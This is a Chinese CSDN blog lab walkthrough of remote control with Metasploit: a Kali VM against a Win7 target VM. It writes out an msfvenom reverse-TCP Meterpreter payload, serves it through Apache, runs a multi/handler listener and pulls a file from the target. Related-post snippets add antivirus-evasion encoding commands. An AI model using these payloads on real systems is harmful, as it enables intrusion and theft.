【简单远程控制】 Metasploit应用

已于 2022-11-21 13:43:56 修改
阅读量1.2k 收藏 5
点赞数 3
文章标签: web安全 网络攻击模型 网络安全 安全
于 2022-11-21 13:42:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61947585/article/details/127962169
版权

文章目录

一、实验环境

kali虚拟机,靶机win7,(都为NAT模式)

二、实验内容

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

三、实验步骤

(1)在kali生成被控端
打开kali终端输入命令,在本地生成攻击荷载

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.47.128 lport=5000 -f exe -o /root/payload.exe


在这里插入图片描述
生成完毕,在将该荷载放到目标靶机上,此时kali就是主控端,靶机是被控端。
PS:在把荷载复制到目标靶机上的时候,可以先把它移动到主机,在从主机移动到靶机;也可以在kali搭建一个网站,将下载链接挂上去,再用靶机去访问这个网站,从而下载下来。(记录一下第二个方法的步骤)
①先在终端查看荷载的存放位置,输入命令ls;

②将荷载的目录地址复制过来,挂到网页上,文件名是 1.exe

命令:cd ./payload/var/www/html/1.exe

在这里插入图片描述
③输入命令:

service apache2 start
service apache2 status
cd /var/www/html
ls

在这里插入图片描述
④在kali的浏览器里输入环回地址:127.0.0.1/1.exe
在这里插入图片描述
⑤最后去靶机的浏览器输入命令:192.168.47.128/1.exe 即可下载
在这里插入图片描述

(2)获得靶机(Windows)的控制权
1.打开kali终端,输入msfconsole命令即可打开Metasploit
在这里插入图片描述
2.使用攻击模块
输入命令:

 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set lhost 192.168.47.128
 set lport 5000
 exploit

在这里插入图片描述
3.然后打开靶机,多次点击攻击荷载,此时kali已经开始监听靶机的行为,我们从网上下载一张图片,下载了以后,在kali也会出现靶机所下载的内容
在这里插入图片描述
图片名其实是1,当时多搞了个文件名,其实kali这边已经帮写好文件名了,然后就多了一个 jpg
(3)下载靶机上的任一文件
1.我们直接下载刚刚靶机下载的那种图片即可,输入download命令
在这里插入图片描述
2.最后打开kali的文件夹,输入下载的图片的存放目录/home/,找到了靶机下载的那张图片,我们已经将他下载下来,复现完毕!
在这里插入图片描述

((⥎)).
关注
使用Metasploit 获取远程 shell
Hdvsns的博客
06-23 276
MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。(5)mshta.exe是用于负责解释运行HTA文件的Windows OS实用程序·可以运行javascript或VBScript的HTML文件,在win7靶机中打开cmd窗口。输入命令:mshta.exe http://192.xxx.xx.xx(kali的IP):8888/xxx(hta文件名).hta。Metasploit远程控制模块。
简单远程控制 Metasploit应用
m0_62659165的博客
11-22 309
简单远程控制 Metasploit应用
kali metasploit 远程控制Windows
天码行空的码的博客
07-08 2229
一、在kali中生成被控制端程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.188 LPORT=5901 -f exe > test.exe #生成Windows端 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.188 LPORT=5555 R
Kali远程控制Android系统(Metasploit)
热门推荐
董哥的黑板报
06-24 3万+
本片文章介绍在使用Linux远程控制Android手机 一、查看Metasploit工具中可以在Android系统下使用的payload类型 可以看到有9种可以在Android下使用的payload 二、端口映射、以及软件签名问题 端口映射问题 如果我们的手机与使用的计算机处在同一局域网,但是虚拟机使用的是NAT模式。那么只有我们使用的计算机才可以访问到该虚拟机,其他设备都是无法访问...
使用Metasploit渗透攻击Windows7并远程执行命令
Grit的博客
07-28 2040
声明:本博文仅供学习交流,请自觉遵守法律法规 环境 实验环境:kali系统,Windows7 kali IP:192.168.38.136 win7 IP:192.168.38.56 大家可以将这两个操作系统安装到虚拟机中,或者用两台电脑进行实验。 Metasploit简介 Metasploit是目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。 Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。
Metasploit远程控制与命令执行
Metasploit简介 ## 1.1 Metasploit基础概念 Metasploit是一款开放源代码的渗透测试工具,旨在帮助安全研究人员和渗透测试人员发现安全漏洞、验证漏洞外部和内部设备的安全性,以及对安全事件进行响应。Metasploit...
Metasploit渗透测试实战技巧:Metasploit实施目标主机远程控制技巧
Metasploit渗透测试简介 ## 1.1 Metasploit概述 Metasploit是一款开源的渗透测试框架,旨在帮助安全专家评估系统、搜索漏洞、开发及执行攻击。Metasploit由rapid7公司进行维护,拥有庞大的漏洞库和强大的攻击模块...
Metasploit中的远程管理和控制技巧
Metasploit的核心思想是“利用即治疗”,它通过利用系统和应用程序中的漏洞来测试其安全性,并帮助用户建立更加健壮的防御策略。与传统的黑盒测试方法相比,Metasploit提供了更加自动化和有针对性的漏洞验证方式,极...
Metasploit与移动应用安全
## 1.1 Metasploit简介 Metasploit是一款开源的安全漏洞检测框架,由Rapid7公司开发和维护。它提供了一套丰富的工具和资源,用于漏洞探测、利用和风险评估。Metasploit具有跨平台性,支持多种操作系统,包括Windows...
android,csploit-安卓系统上最完整、最先进的it安全专业工具包。.zip
09-25
csploit是一个免费/libre和开源(gpled)的android网络分析和渗透套件,旨在
Metasploit实验:制作免杀payload+对任意“外网”主机的远控
wjwqp的专栏
04-09 3413
*本文只做技术交流之用,技术无罪,希望大家知法懂法,更要守法 我发一个文件,你电脑就被我控制了,我可以拍照摄像下载文件,杀毒软件也不管用!这是怎么做到的呢? 这个问题的实现需要拆分成下面三个模块 内网穿透到外网 制作免杀木马后门 Metasploit控制客户机 环境准备 操作系统 用途 IP地址 需要软件 Kali 制作payload,攻击,映射端口 ...
metasploit启动远程shell而不被杀毒软件发现
天元喜羊羊的博客
04-29 2462
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikat
【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)
qq_45138120的博客
06-23 9831
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
【2023最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了_
ZL_1618的博客
09-08 647
Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit,使用框架以及利用漏洞。
Metasploitable渗透测试实战:ms12-020
m0_60121089的博客
05-06 608
1.漏洞描述 ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。(ms12-020漏洞可用于漏洞攻击) 根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。 2.实战工具 软件:VMware Workstation 14 攻击机:kali(ip:192.168.240.143) 靶机:win7(ip:192.168.240.159)
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
weixin_62490257的博客
06-29 4007
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
metasploit快速入门(一)安装部署
whatday的专栏
11-03 8706
目录 简介 1 在Windows上安装Metasploit 2在Linux和MacOS上安装Metasploit 3在Kali Linux上使用Metasploit 4升级Kali Linux 5构建渗透测试实验环境 6配置SSH连接 7使用SSH连接到Kali 8配置PostgreSQL数据库 9创建工作区 10使用数据库 11 使用 hosts 命令 ...
解决移植Metasploitable3到VM虚拟机无网络的问题
最新发布
余十步的博客
05-25 391
导入后不要开机,先在虚拟机设置里面将原有的两个网络适配器移除。接着在选项里面,在客户机操作系统里面,选择Microsoft Windwos(W),版本选择Windows Server 2008 R2 x64先打开虚拟机,然后再添加一个网络适配器(没有打开添加不知道行不行,你们可以试试)在终端里面输入ipconfig测试一下有没有网卡,之前是识别不到网卡的,这里可以看到我是设置成功了,也可以上百度在kali系统里面测试能不能相互连接,我之前虚拟机网段都设置好了,如果没有大问题选择NET模式都是处于一个网段上的
Metasploit框架详解:从基础到应用
- **msfapi**:远程调用接口,允许与其他应用程序集成。 5. **功能程序**: - **msfpayload**:生成攻击载荷。 - **msfencode**:编码攻击载荷以躲避检测。 - **msfvenom**:综合工具,取代了msfpayload和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值